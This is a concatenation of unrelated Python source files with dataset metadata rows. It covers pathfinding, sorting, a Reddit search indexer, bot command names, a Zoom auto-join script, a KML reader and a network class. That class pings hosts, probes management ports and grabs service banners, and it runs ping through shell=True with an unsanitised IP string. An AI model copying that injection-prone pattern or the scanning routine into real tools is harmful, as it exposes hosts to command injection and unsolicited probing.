def random_neighbor(self, space: Space) -> Space:
valid_neighbors = list(self.neighbors(space))
logging.info(valid_neighbors)
# random.shuffle(valid_neighbors) # TODO: Unnecessary?
r = random.randint(0, len(valid_neighbors) - 1)
result = valid_neighbors[r]
return result
def cost(self, start: Space, end: Space):
return 1 # TODO: More complex movement cost
# A* Pathfinding
def path_find(start: tuple, goal: tuple, graph: Grid):
"""Pathfinding graph algorithm"""
start = Space(*start)
goal = Space(*goal)
frontier = PriorityQueue()
frontier.put((0, start))
came_from = dict()
came_from[start] = None
cost_so_far = dict()
cost_so_far[start] = 0
while not frontier.empty():
current = frontier.get()[1]
if current == goal:
break
for next in graph.neighbors(current):
new_cost = cost_so_far[current] + graph.cost(current, next)
if next not in cost_so_far or new_cost < cost_so_far[next]:
cost_so_far[next] = new_cost
priority = new_cost + grid_distance(next, goal)
frontier.put((priority, next))
came_from[next] = current
return came_from, cost_so_far
# Dijkstra's Rangefinding
def range_find(start: tuple, range: int, graph: Grid):
start = Space(*start)
frontier = PriorityQueue()
frontier.put((0, start))
came_from = dict()
came_from[start] = None
cost_so_far = dict()
cost_so_far[start] = 0
while not frontier.empty():
current = frontier.get()[1]
# No goal/early exit
for next in graph.neighbors(current):
new_cost = cost_so_far[current] + graph.cost(current, next)
if new_cost < range and (next not in cost_so_far or new_cost < cost_so_far[next]):
cost_so_far[next] = new_cost
priority = new_cost
frontier.put((priority, next))
came_from[next] = current
return came_from, cost_so_far
def path_reconstruct(start: tuple, goal: tuple, search_result: dict) -> list:
result_path = list()
start = Space(*start)
current = Space(*goal)
while search_result[current] is not None:
# Add current location to reverse path
result_path.append(current)
current = search_result[current]
# Reached start, add start to path
result_path.append(start)
# Reverse the path to generate foward path TODO Optional flag?
# result_path.reverse()
return result_path
def grid_distance(a: Space, b: Space):
# Manhattan distance, square grid
return abs(a.x - b.x) + abs(a.y - b.y)
# ----- Testing Area -----
def test_hash():
test_coordinates = (0, 0)
space_a = Space(test_coordinates)
space_b = Space(test_coordinates)
if not hash(space_a) == hash(space_b):
print("Hash equality NOT working")
else:
print("Hash equality working on named tuples")
def test_hash_to_non_named_tuple():
test_coordinates = (1, 1)
test_grid_space = Space((1, 1))
if not hash(test_coordinates) == hash(test_grid_space):
print("CanNOT compare hashes from named/non-named tuples")
else:
print("Can indeed compare hashes of regular and named tuples across")
def test_compare_tuple_named_tuple():
test_coordinates = (1, 1)
test_grid_space = Space((1, 1))
if not test_coordinates == test_grid_space:
print("CanNOT compare equality from named/non-named tuples")
else:
print("Can indeed compare equality of regular and named tuples across")
def test_grid_dict_subclass():
test_coordinates = (0, 0)
grid = Grid(1, 1)
# grid.map[space_a] = 5
grid[test_coordinates] = 5
# space_c = Space(0, 0)
test_get = grid[test_coordinates]
if not test_get == 5:
print("Hashtable set/fetch NOT working")
else:
print("Hashtable set and get by Space coordinates working")
def test_all():
test_hash()
test_grid_dict_subclass()
test_hash_to_non_named_tuple()
test_compare_tuple_named_tuple()
if __name__ == "__main__":
# Run Tests
test_all() | 31.52973 | 111 | 0.646837 | 1,166 | 0.199897 | 388 | 0.066518 | 0 | 0 | 0 | 0 | 1,128 | 0.193382 |
2b97eff95c0bd2b394c9963727e6fead9c0d98c4 | 471 | py | Python | BubbleSort.py | Jutraman/SortingProblem | f3f1ea91fdfd44bc5fe523bd3a1dd7949222e71b | [
"BSD-3-Clause"
] | null | null | null | BubbleSort.py | Jutraman/SortingProblem | f3f1ea91fdfd44bc5fe523bd3a1dd7949222e71b | [
"BSD-3-Clause"
] | null | null | null | BubbleSort.py | Jutraman/SortingProblem | f3f1ea91fdfd44bc5fe523bd3a1dd7949222e71b | [
"BSD-3-Clause"
] | null | null | null | """
Project name: SortingProblem
File name: BubbleSort.py
Description:
version:
Author: Jutraman
Email: jutraman@hotmail.com
Date: 04/07/2021 21:49
LastEditors: Jutraman
LastEditTime: 04/07/2021
Github: https://github.com/Jutraman
"""
def bubble_sort(array):
length = len(array)
for i in range(length):
for j in range(length - i):
if array[j] > array[j + 1]:
array[j], array[j + 1] = array[j + 1], array[j]
return array | 22.428571 | 63 | 0.643312 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 236 | 0.501062 |
2b97f27689c29817d3fc17a2b5b71b9419f2063e | 6,023 | py | Python | indexerNew.py | philophilo/searchingReddit | 5c10dc70ecf6a614863403f28a91efe73c11fede | [
"MIT"
] | null | null | null | indexerNew.py | philophilo/searchingReddit | 5c10dc70ecf6a614863403f28a91efe73c11fede | [
"MIT"
] | null | null | null | indexerNew.py | philophilo/searchingReddit | 5c10dc70ecf6a614863403f28a91efe73c11fede | [
"MIT"
] | null | null | null | #!/home/master00/anaconda23/bin/python
from util import *
import argparse
import base64
import os
import json
from collections import defaultdict
# Two main type of indexes
# -- Forward index
# -- Inverted index
# Forward index
# doc1 -> [learning, python, how, to]
# doc2 -> [learning, c++]
# ...
# doc3 -> [python, c++]
# inverted index
# learning -> [doc1, doc2]
# python -> [doc1, doc3]
# how -> [doc1]
# to -> [doc1]
# c++ -> [doc2, doc3]
# TODO: improve this
# Indexer assumes that collection fits in ram
#
class Indexer(object):
def __init__(self):
self.inverted_index = dict()
self.forward_index = dict()
self.url_to_id = dict()
self.doc_count = 0
# TODO: remove these assumptions
# assumes that add_document() is never called twice for a document
# assumes that a document has a unique url
# parsed_text is a list of Terms
def add_document(self, url, parsed_text):
self.doc_count += 1
assert url not in self.url_to_id
current_id = self.doc_count
self.url_to_id[url] = current_id
print(self.url_to_id[url], "\t", current_id)
self.forward_index[current_id] = parsed_text
for position, term in enumerate(parsed_text):
#TODO default dict
if term not in self.inverted_index:
# if the word doesn't exist in the database
# create a list on which to append doc id and
# the position in the doc
self.inverted_index[term] = []
self.inverted_index[term].append((position, current_id))
def save_on_disk(self, index_dir):
def dump_json_to_file(source, file_name):
file_path = os.path.join(index_dir, file_name)
json.dump(source, open(file_path, "w"), indent=4)
dump_json_to_file(self.inverted_index, "inverted_index")
dump_json_to_file(self.forward_index, "forward_index")
dump_json_to_file(self.url_to_id, "url_to_id")
class Searcher(object):
def __init__(self, index_dir):
self.inverted_index = dict()
self.forward_index = dict()
self.url_to_id = dict()
self.doc_count = dict()
def load_json_from_file(file_name):
file_path = os.path.join(index_dir, file_name)
dst = json.load(open(file_path))
return dst
self.inverted_index = load_json_from_file("inverted_index")
self.forward_index = load_json_from_file("forward_index")
self.url_to_id = load_json_from_file("url_to_id")
self.id_to_url = {v : k for k,v in self.url_to_id.iteritems()}
"""
# query [word1, word2] -> returns all documents that contain one of these words
# sort of OR
def find_documents(self, query_terms):
return sum([self.inverted_index[word] for word in query_terms], [])
"""
def generate_snippet(self, query_terms, doc_id):
query_terms_in_window = []
best_window_len = 100500 # TODO: inf would be better ;)
words_in_best_window = 0
best_window = []
for pos,word in enumerate(self.forward_index[unicode(doc_id)]):
if word in query_terms:
query_terms_in_window.append((word, pos))
if len(query_terms_in_window) > 1 and query_terms_in_window[0] == word:
query_terms_in_window.pop(0)
current_window_len = pos-query_terms_in_window[0][1] + 1
wiw = len(set(map(lambda x: x[0], query_terms_in_window)))
if wiw > words_in_best_window or (wiw == words_in_best_window and current_window_len < best_window_len):
words_in_best_window = wiw
best_window = query_terms_in_window[:]
best_window_len = current_window_len
doc_len = len(self.forward_index[unicode(doc_id)])
# TODO 15 should be a named constant
snippet_start = max(best_window[0][1] - 15, 0)
snippet_end = min(doc_len, best_window[len(best_window) - 1][1] + 1 + 15)
return [(term, term in query_terms) for term in self.forward_index[unicode(doc_id)][snippet_start:snippet_end]]
def find_documents_AND(self, query_terms):
# docid -> number of query words
docids = set()
query_word_count = defaultdict(set)
for query_word in query_terms:
for (pos, docid) in self.inverted_index.get(query_word, []):
try:
query_word_count[docid].add(query_word)
except Exception as e:
print "Error:", e, self.inverted_index.get(query_word, [])
return [docid for docid, unique_hits in query_word_count.iteritems() if len(unique_hits) == len(query_terms)]
# sort of OR
def find_documens_OR(self, query_terms):
docids = set()
for query_word in query_terms:
for (pos, docid) in self.inverted_index.get(query_word, []):
docids.add(docid)
return docids
def get_document_text(self, doc_id):
return self.forward_index[unicode(doc_id)]
def get_url(self, doc_id):
return self.id_to_url[doc_id]
def create_index_from_dir(stored_documents_dir, index_dir):
indexer = Indexer()
for filename in os.listdir(stored_documents_dir):
opened_file = open(os.path.join(stored_documents_dir, filename))
# TODO: words are not just seperated not just by space, but commas, semicolons, etc
parsed_doc = parseRedditPost(opened_file.read()).split(" ")
indexer.add_document(base64.b16decode(filename), parsed_doc)
indexer.save_on_disk(index_dir)
def main():
parser = argparse.ArgumentParser(description='Index /r/learnprogramming')
parser.add_argument("--stored_documents_dir", dest="stored_documents_dir", required=True)
parser.add_argument("--index_dir", dest="index_dir", required=True)
args = parser.parse_args()
create_index_from_dir(args.stored_documents_dir, args.index_dir)
if __name__ =="__main__":
main()
| 37.64375 | 120 | 0.65034 | 4,630 | 0.76872 | 0 | 0 | 0 | 0 | 0 | 0 | 1,308 | 0.217168 |
2b99df630754e76cc6e5831dd642cb6b5cc27841 | 3,169 | py | Python | main/cogs/commands.py | ParzivalEugene/Samurai | ff6236f4477c070b1f3ef3568256791324fc2bbf | [
"Apache-2.0"
] | 4 | 2021-04-04T16:21:58.000Z | 2021-07-13T20:33:41.000Z | main/cogs/commands.py | ParzivalEugene/Samurai | ff6236f4477c070b1f3ef3568256791324fc2bbf | [
"Apache-2.0"
] | null | null | null | main/cogs/commands.py | ParzivalEugene/Samurai | ff6236f4477c070b1f3ef3568256791324fc2bbf | [
"Apache-2.0"
] | 2 | 2021-06-20T17:06:57.000Z | 2021-06-20T17:07:48.000Z | from types import SimpleNamespace
class Names(SimpleNamespace):
def __init__(self, dictionary, **kwargs):
super().__init__(**kwargs)
for key, value in dictionary.items():
if isinstance(value, dict):
self.__setattr__(key, Names(value))
else:
self.__setattr__(key, value)
commands_names_dict = {
"chatting": {
"help": "help",
},
"birthdays": {
"help": "bd_help",
"set_chat": "bd_set_chat",
"up_chat": "bd_up_chat",
"del_chat": "bd_del_chat",
"show_chat": "bd_show_chat",
"add": "bd_add",
"up": "bd_update",
"delete": "bd_delete",
"show_bd": "bd",
"show_bds": "bd_show"
},
"translator": {
"help": "tr_help",
"translate": "tr_trans",
"detect_language": "tr_detect_lang",
"languages_list": "tr_list",
"game_detect_languages": "tr_game"
},
"connect_four": {
"help": "c4_help",
"rules": "c4_rules",
"init game": "c4",
"place": "c4_place",
"lose": "c4_lose"
},
"mini_cogs": {
"help": "mini_help",
"head_or_tails": "toss",
"magic_ball": "8ball",
"get_forecast": "forecast",
"get_quote": "inspire"
},
"music_player": {
"help": "player_help",
"join": "join",
"leave": "leave",
"queue": "queue",
"play": "play",
"pause": "pause",
"resume": "resume",
"stop": "stop",
"skip": "skip",
"previous": "previous",
"shuffle": "shuffle",
"loop": "loop",
"volume": "volume",
"volume_up": "up",
"volume_down": "down",
"lyrics": "lyrics",
"equalizer": "eq",
"advanced_equalizer": "adveq",
"now_playing": "np",
"skip_to_current_index": "skipto",
"restart": "restart",
"seek": "seek",
},
"tic_tac_toe": {
"game_help": "xo_help",
"rules": "xo_rules",
"init_game": "xo",
"place": "xo_place",
"lose": "xo_lose"
},
"level": {
"help": "level_help",
"add": "level_add",
"up": "level_up",
"delete": "level_del",
"show_levels": "level_show",
"show_level": "level",
"dashboard": "level_dashboard"
},
"wikipedia": {
"help": "wp_help",
"wikipedia_search": "wp"
},
"glossary": {
"help": "gl_help",
"view_status": "gl",
"set_language": "gl_lang",
"set_vibe": "gl_vibe"
}
}
commands_names = Names(commands_names_dict)
| 30.180952 | 51 | 0.408015 | 311 | 0.098138 | 0 | 0 | 0 | 0 | 0 | 0 | 1,312 | 0.414011 |
2b9b72a609da9b50aea8bfaf7b95a744bb5c29be | 1,831 | py | Python | scripts/practice/FB/NestedListWeightSum.py | bhimeshchauhan/competitive_programming | e0777bb0c425ffa03d8173a83e50ca55c4a3fcf5 | [
"MIT"
] | null | null | null | scripts/practice/FB/NestedListWeightSum.py | bhimeshchauhan/competitive_programming | e0777bb0c425ffa03d8173a83e50ca55c4a3fcf5 | [
"MIT"
] | 8 | 2020-09-05T16:04:31.000Z | 2022-02-27T09:57:51.000Z | scripts/practice/FB/NestedListWeightSum.py | bhimeshchauhan/competitive_programming | e0777bb0c425ffa03d8173a83e50ca55c4a3fcf5 | [
"MIT"
] | null | null | null | """
Nested List Weight Sum
You are given a nested list of integers nestedList. Each element is either an integer or a
list whose elements may also be integers or other lists.
The depth of an integer is the number of lists that it is inside of. For example,
the nested list [1,[2,2],[[3],2],1] has each integer's value set to its depth.
Return the sum of each integer in nestedList multiplied by its depth.
Example 1:
Input: nestedList = [[1,1],2,[1,1]]
Output: 10
Explanation: Four 1's at depth 2, one 2 at depth 1. 1*2 + 1*2 + 2*1 + 1*2 + 1*2 = 10.
Example 2:
Input: nestedList = [1,[4,[6]]]
Output: 27
Explanation: One 1 at depth 1, one 4 at depth 2, and one 6 at depth 3. 1*1 + 4*2 + 6*3 = 27.
Example 3:
Input: nestedList = [0]
Output: 0
Constraints:
1 <= nestedList.length <= 50
The values of the integers in the nested list is in the range [-100, 100].
The maximum depth of any integer is less than or equal to 50.
"""
# DFS
from collections import deque
class Solution:
def depthSum(self, nestedList):
def dfs(nested_list, depth):
total = 0
for nested in nested_list:
if nested.isInteger():
total += nested.getInteger() * depth
else:
total += dfs(nested.getList(), depth + 1)
return total
return dfs(nestedList, 1)
# BFS
class Solution:
def depthSum(self, nestedList):
queue = deque(nestedList)
depth = 1
total = 0
while len(queue) > 0:
for i in range(len(queue)):
nested = queue.pop()
if nested.isInteger():
total += nested.getInteger() * depth
else:
queue.extendleft(nested.getList())
depth += 1
return total
| 23.474359 | 92 | 0.592572 | 838 | 0.457673 | 0 | 0 | 0 | 0 | 0 | 0 | 950 | 0.518842 |
2b9c734ead852fe398bcf4cfccc73af317c3a224 | 52 | py | Python | torrenttv/utils/list_utils/__init__.py | AlexCovizzi/torrenttv | 25ae5490568110a7ea1f2e5eb74505ef8eea002d | [
"MIT"
] | null | null | null | torrenttv/utils/list_utils/__init__.py | AlexCovizzi/torrenttv | 25ae5490568110a7ea1f2e5eb74505ef8eea002d | [
"MIT"
] | 19 | 2020-05-03T17:06:24.000Z | 2021-03-11T05:26:57.000Z | torrenttv/utils/list_utils/__init__.py | AlexCovizzi/torrenttv | 25ae5490568110a7ea1f2e5eb74505ef8eea002d | [
"MIT"
] | 1 | 2020-05-04T19:00:00.000Z | 2020-05-04T19:00:00.000Z | from .flatten import flatten
__all__ = ["flatten"]
| 13 | 28 | 0.730769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 | 0.173077 |
2b9d72d72fd5c63abb08e7957792d60430f4fc1f | 490 | py | Python | metadeploy/api/migrations/0045_product_license_requirements.py | sfdc-qbranch/MetaDeploy | d22547b3814dbec6aefa4d86b9f81c6f175c1b67 | [
"BSD-3-Clause"
] | 33 | 2019-03-20T15:34:39.000Z | 2022-03-30T15:59:40.000Z | metadeploy/api/migrations/0045_product_license_requirements.py | sfdc-qbranch/MetaDeploy | d22547b3814dbec6aefa4d86b9f81c6f175c1b67 | [
"BSD-3-Clause"
] | 2,718 | 2019-02-27T19:46:07.000Z | 2022-03-11T23:18:09.000Z | metadeploy/api/migrations/0045_product_license_requirements.py | sfdc-qbranch/MetaDeploy | d22547b3814dbec6aefa4d86b9f81c6f175c1b67 | [
"BSD-3-Clause"
] | 28 | 2019-03-28T04:57:16.000Z | 2022-02-04T16:49:25.000Z | # Generated by Django 2.1.5 on 2019-01-28 21:04
import sfdo_template_helpers.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("api", "0044_merge_20190125_1502")]
operations = [
migrations.AddField(
model_name="product",
name="license_requirements",
field=sfdo_template_helpers.fields.MarkdownField(
blank=True, property_suffix="_markdown"
),
)
]
| 24.5 | 61 | 0.640816 | 369 | 0.753061 | 0 | 0 | 0 | 0 | 0 | 0 | 120 | 0.244898 |
2b9eb938fe54fa2c98c7980b235b4562b7169504 | 742 | py | Python | Zoom.py | NotSharwan/Zoom-Python-Bot | 2b063913ae24f0bee11a980a8b3b5d5f764a8ffe | [
"MIT"
] | null | null | null | Zoom.py | NotSharwan/Zoom-Python-Bot | 2b063913ae24f0bee11a980a8b3b5d5f764a8ffe | [
"MIT"
] | null | null | null | Zoom.py | NotSharwan/Zoom-Python-Bot | 2b063913ae24f0bee11a980a8b3b5d5f764a8ffe | [
"MIT"
] | null | null | null | import webbrowser
import time
import datetime
def openLink(url):
webbrowser.register('chrome', None, webbrowser.BackgroundBrowser(
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"))
webbrowser.get('chrome').open(url)
def zoomJoin(h, m, url):
for i in range(0, 365):
t = datetime.datetime.today()
future = datetime.datetime(t.year, t.month, t.day, h, m)
if t.hour >= 2:
future += datetime.timedelta(days=1)
time.sleep((future-t).seconds)
openLink(url)
# Calling the Function
zoomJoin(h, m, Link)
# h = Hour in 24 format
# m = Minutes in 24 format
# Link = Paste the Zoom link in " " or ' '
"""
EXAMPLE:
zoomJoin(10, 00, "https://zoom.us/w/xxxxxxxxx")
"""
| 23.1875 | 71 | 0.638814 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 254 | 0.342318 |
2b9fa2a8d5732bafdcbd0c0f7502d06854051c46 | 3,992 | py | Python | syspy/io/pandasshp/pandaskml.py | systragroup/quetzal | bb7934bcae588cddf0f0da810d75114d1c64768f | [
"CECILL-B"
] | 25 | 2018-11-20T16:33:02.000Z | 2022-03-03T12:46:52.000Z | syspy/io/pandasshp/pandaskml.py | systragroup/quetzal | bb7934bcae588cddf0f0da810d75114d1c64768f | [
"CECILL-B"
] | 14 | 2019-06-13T13:26:20.000Z | 2022-01-13T03:51:07.000Z | syspy/io/pandasshp/pandaskml.py | systragroup/quetzal | bb7934bcae588cddf0f0da810d75114d1c64768f | [
"CECILL-B"
] | 4 | 2020-01-31T18:34:59.000Z | 2022-03-18T17:22:45.000Z | import itertools
import json
import os
import zipfile
import kml2geojson
import pandas as pd
import shapely
from shapely import geometry
from syspy.io.pandasshp import pandasshp
from tqdm import tqdm
def list_files(path, patterns):
files = [
os.path.join(path, file)
for file in os.listdir(path)
if file.split('.')[-1].lower() in patterns
]
subdirectories = [
os.path.join(path, dir)
for dir in os.listdir(path)
if os.path.isdir(os.path.join(path, dir))
]
files += list(
itertools.chain(
*[
list_files(subdirectory, patterns)
for subdirectory in subdirectories
]
)
)
return files
def read_kmz_folder(folder):
geometries = []
files = list_files(folder, ['kmz'])
for filename in files:
# ValueError: Unknown geometry type: geometrycollection
kmz = zipfile.ZipFile(filename, 'r')
kml = kmz.open('doc.kml', 'r')
to_write = kml.read().decode()
kmlname = filename.replace('.kmz', '.kml').split(folder)[1]
kmlfilename = folder + 'temp.kml'
with open(kmlfilename, 'w') as test:
test.write(to_write)
kml2geojson.convert(
kmlfilename,
folder + 'temp'
)
with open(folder + 'temp/temp.geojson', 'r') as file:
d = json.load(file)
to_add = []
for g in d['features']:
try:
to_add.append(
(
g['properties']['name'],
shapely.geometry.shape(g['geometry']),
kmlname
)
)
except Exception:
print('fail')
geometries += to_add
return pd.DataFrame(geometries, columns=['name', 'geometry', 'kml'])
def read_kmz(folder, kmzname):
kmzfilename = (folder + kmzname + '.kmz').replace('.kmz.kmz', '.kmz')
geometries = []
# ValueError: Unknown geometry type: geometrycollection
kmz = zipfile.ZipFile(kmzfilename, 'r')
with kmz.open('doc.kml', 'r') as kml:
to_write = kml.read().decode()
to_format = to_write.split('<Folder>')[0] + '%s' + to_write.split('</Folder>')[-1]
insert_strings = [s.split('</Folder>')[0] for s in to_write.split('<Folder>')[1:]]
kmlfilename = folder + 'temp.kml'
for insert in tqdm(insert_strings):
to_add = []
name = insert.split('<name>')[1].split('</name>')[0]
to_write = to_format % insert
with open(kmlfilename, 'w') as file:
file.write(to_write)
kml2geojson.convert(
kmlfilename,
folder + 'temp'
)
with open(folder + 'temp/temp.geojson', 'r') as file:
d = json.load(file)
print(len(d['features']))
for g in d['features']:
try:
desc = g['properties']['description']
except Exception:
desc = ''
try:
to_add.append(
(
g['properties']['name'],
desc,
shapely.geometry.shape(g['geometry']),
kmzname,
name
)
)
except ValueError: # Unknown geometry type: geometrycollection
pass
geometries += to_add
layers = pd.DataFrame(
geometries,
columns=['name', 'desc', 'geometry', 'kmz', 'folder']
)
return layers
def write_shp_by_folder(layers, shapefile_folder, **kwargs):
for folder in tqdm(set(layers['folder'])):
try:
layer = layers.loc[layers['folder'] == folder]
pandasshp.write_shp(
shapefile_folder + '//' + folder + '.shp',
layer,
**kwargs
)
except KeyError:
print(folder)
| 27.916084 | 86 | 0.510271 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 571 | 0.143036 |
2ba14a323b129afb523e5528fb8af1dd3e946a61 | 1,556 | py | Python | utils/plots.py | vovamedentsiy/mpdnn | 9d5966a95a27c8c9037c46cbc50d91fe8d387c1e | [
"MIT"
] | null | null | null | utils/plots.py | vovamedentsiy/mpdnn | 9d5966a95a27c8c9037c46cbc50d91fe8d387c1e | [
"MIT"
] | 1 | 2021-03-26T07:53:19.000Z | 2021-03-26T14:47:23.000Z | utils/plots.py | vovamedentsiy/mpdnn | 9d5966a95a27c8c9037c46cbc50d91fe8d387c1e | [
"MIT"
] | null | null | null | import matplotlib
matplotlib.use('PS')
from matplotlib import pyplot as plt
import seaborn as sns
import numpy as np
import random
def autolabel(rects, ax, coeff = 1):
"""Attach a text label above each bar in *rects*, displaying its height."""
for rect in rects:
height = rect.get_height()
#ax.annotate('{:.3f}'.format(height, prec=3),
ax.annotate('{:.1f}%'.format(height * 100, prec=1),
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=(0, 3), # 3 points vertical offset
textcoords="offset points",
ha='center', va='bottom', size=1.0)
def plot_weight_histograms(frequencies, names, name_to_save):
fig, ax = plt.subplots(5, 4, figsize=(15, 10))
fig.tight_layout()
i = 0
for row in ax:
for ax_ in row:
plt.sca(ax_)
freqs = list(frequencies[i].values())
grid = np.array(list(frequencies[i].keys()))
bits_info = str(int(np.ceil(np.log2(len(grid)))))
if len(grid) > 32:
# not to overload plots
freqs = freqs[:16]
grid = grid[:16]
bits_info += ' No plot'
rects1 = plt.bar(grid , width=0.75, height=freqs)
autolabel(rects1, ax_)
plt.title(names[i] + ' B'+bits_info, size=10)
plt.xticks([], [])
plt.yticks([], [])
i+=1
filename = name_to_save + '.eps'
plt.savefig(filename, format='eps')
plt.close() | 30.509804 | 79 | 0.535347 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 238 | 0.152956 |
2ba20cdbe21eded23a10e339852b7da8fa1eb902 | 948 | py | Python | conftest.py | dasap89/rest_accounts | e0daeece000391d93e1bc99db484b8fe45588046 | [
"MIT"
] | null | null | null | conftest.py | dasap89/rest_accounts | e0daeece000391d93e1bc99db484b8fe45588046 | [
"MIT"
] | null | null | null | conftest.py | dasap89/rest_accounts | e0daeece000391d93e1bc99db484b8fe45588046 | [
"MIT"
] | null | null | null | """Additional configuration for pytest"""
import datetime
import os
import pytest
from django.contrib.auth import get_user_model
from rest_framework.authtoken.models import Token
User = get_user_model()
# pylint: disable=redefined-outer-name,unused-argument,no-member
@pytest.fixture(scope='session')
def django_db_setup(django_db_setup, django_db_blocker):
"""Set up the database for tests that need it"""
with django_db_blocker.unblock():
user_one = User.objects.create_user(
email='user_one@example.com',
password='test_123'
)
Token.objects.create(user=user_one)
@pytest.mark.django_db
def get_token(email='user_one@example.com'):
"""
Get user token from db
:param user: User name
:return: Key value from Token model object
"""
test_user = User.objects.get(email=email)
# pylint: disable=no-member
return Token.objects.get(user_id=test_user.id).key
| 26.333333 | 64 | 0.714135 | 0 | 0 | 0 | 0 | 671 | 0.707806 | 0 | 0 | 355 | 0.374473 |
2ba38d92cac59d9afb0607dd598cb535e95a6b6e | 1,099 | py | Python | lib/rucio/db/sqla/migrate_repo/versions/35ef10d1e11b_change_index_on_table_requests.py | balrampariyarath/rucio | 8a68017af6b44485a9620566f1afc013838413c1 | [
"Apache-2.0"
] | 1 | 2017-08-07T13:34:55.000Z | 2017-08-07T13:34:55.000Z | lib/rucio/db/sqla/migrate_repo/versions/35ef10d1e11b_change_index_on_table_requests.py | pujanm/rucio | 355a997a5ea213c427a5d841ab151ceb01073eb4 | [
"Apache-2.0"
] | null | null | null | lib/rucio/db/sqla/migrate_repo/versions/35ef10d1e11b_change_index_on_table_requests.py | pujanm/rucio | 355a997a5ea213c427a5d841ab151ceb01073eb4 | [
"Apache-2.0"
] | 1 | 2021-06-17T14:15:15.000Z | 2021-06-17T14:15:15.000Z | """
Copyright European Organization for Nuclear Research (CERN)
Licensed under the Apache License, Version 2.0 (the "License");
You may not use this file except in compliance with the License.
You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
Authors:
- Vincent Garonne, <vincent.garonne@cern.ch>, 2014-2017
change index on table requests
Revision ID: 35ef10d1e11b
Revises: 3152492b110b
Create Date: 2014-06-20 09:01:52.704794
"""
from alembic.op import create_index, drop_index
# revision identifiers, used by Alembic.
revision = '35ef10d1e11b' # pylint:disable=invalid-name
down_revision = '3152492b110b' # pylint:disable=invalid-name
def upgrade():
'''
upgrade method
'''
create_index('REQUESTS_TYP_STA_UPD_IDX', 'requests', ["request_type", "state", "updated_at"])
drop_index('REQUESTS_TYP_STA_CRE_IDX', 'requests')
def downgrade():
'''
downgrade method
'''
create_index('REQUESTS_TYP_STA_CRE_IDX', 'requests', ["request_type", "state", "created_at"])
drop_index('REQUESTS_TYP_STA_UPD_IDX', 'requests')
| 27.475 | 97 | 0.730664 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 872 | 0.793449 |
2ba3e284047fe1a855f0e6c487a5127e854e9da7 | 20,152 | py | Python | src/Connect.py | JurgenOS/net_node | 97f30263d7dd740f0eeeeb42f2555cab0bf2520e | [
"Apache-2.0"
] | 2 | 2021-04-05T08:26:05.000Z | 2021-04-05T08:26:10.000Z | src/Connect.py | JurgenOS/net_node | 97f30263d7dd740f0eeeeb42f2555cab0bf2520e | [
"Apache-2.0"
] | null | null | null | src/Connect.py | JurgenOS/net_node | 97f30263d7dd740f0eeeeb42f2555cab0bf2520e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import time
import re
import os
import paramiko
import telnetlib
from subprocess import run, PIPE, DEVNULL
from socket import socket, AF_INET, SOCK_STREAM
from multiprocessing.pool import ThreadPool as Pool
from src.ResponseParser import ResponseParser
from src.helpers.names_and_regex import HOST_NAME_REG
from src.helpers.ugly_charset import replace_ansi_char, convert_to_utf
from src.helpers.Errors import *
from pysnmp.hlapi import getCmd, SnmpEngine, CommunityData, \
UdpTransportTarget, ContextData, ObjectType, ObjectIdentity
class Connect(ResponseParser):
def __init__(self, ip, log_dir):
super().__init__(ip, log_dir)
self.connection: object = None
self.mng_protocol: str = ''
self.ssh: str = ''
self.telnet: str = ''
self.http: str = ''
self.https: str = ''
self.answer_delay: int = 10
self.connection_timeout: int = 70
self.date_of_last_ping: str = ''
self.is_available: str = ''
def is_available_by_icmp(self):
res = ''
correct_answer = b"ttl="
command = "ping -c 2 {}".format(self.ip)
if 'win' in os.sys.platform.lower():
command = "ping -n 2 {}".format(self.ip)
response = run(command, shell=True, stdout=PIPE, stderr=DEVNULL)
if response.returncode == 0:
if correct_answer in response.stdout.lower():
self.logger.info(response.stdout.lower())
res = ' '.join(time.asctime().split()[1:-1])
self.is_available = res
else:
self.logger.info('not available')
return res
def scan_ports(self, *ports):
output = b''
result = []
for port in ports:
port = str(port)
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.settimeout(15)
try:
client_socket.connect((self.ip, port))
output += client_socket.recv(4096)
time.sleep(1)
output += client_socket.recv(4096)
if b'connection refused' in output or \
b'connection closed by remote host!' in output:
result.append('')
continue
except:
result.append('')
continue
client_socket.close()
result.append(output)
return result
def scan_port(self, port):
output = b''
port = int(port)
delay: int = 0
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.settimeout(10)
try:
start_time = time.time()
client_socket.connect((self.ip, port))
time.sleep(3)
output += client_socket.recv(4096)
if b'connection refused' in output or \
b'connection closed by remote host!' in output:
output = b''
delay = round(
time.time() - start_time
)
except:
delay = 0
output = b''
client_socket.close()
return port, output.decode('utf-8', 'ignore'), delay
def scan_mng_ports(self):
"""
return a list in format:['SSH'|'SSHv1','Telnet', 'Http, 'Https', 'Vendor','Nov 29 10:11:17']
"""
result = []
vendor = ''
res = []
delay_list = []
list_of_ports = [22, 23, 80, 443]
# ===== multithreading =====
worker = self.scan_port
pool = Pool(4)
res.extend(pool.map(worker, list_of_ports))
pool.close()
pool.join()
# ===== for debug =====
# for port in list_of_ports:
# res.append(self.scan_port(port))
for item in res:
port, response, delay = item
delay_list.append(delay)
if not response:
result.append('')
continue
if port == 22:
if 'SSH-2.0' in response:
result.append('SSH')
if 'SSH-1.99' in response:
result.append('SSH')
if 'SSH-1.5' in response:
result.append('SSHv1')
if port == 23:
result.append('Telnet')
if port == 80:
result.append('Http')
if port == 443:
result.append('Https')
if not vendor:
vendor = self.find_vendor(response)
self.answer_delay = max(delay_list)
result.append(vendor)
result.append(' '.join(time.asctime().split()[1:-1]))
self.logger.info(result)
return result
def scan_mng_protocols(self):
if not self.is_available_by_icmp():
raise NotAvailable
ssh, telnet, http, https, vendor, date = self.scan_mng_ports()
self.date_of_last_ping = date
self.telnet = telnet
self.ssh = ssh
self.http = http
self.https = https
if not self.vendor:
self.vendor = vendor
if telnet.lower() == 'telnet':
self.mng_protocol = 'telnet'
if ssh.lower() == 'ssh':
self.mng_protocol = 'ssh'
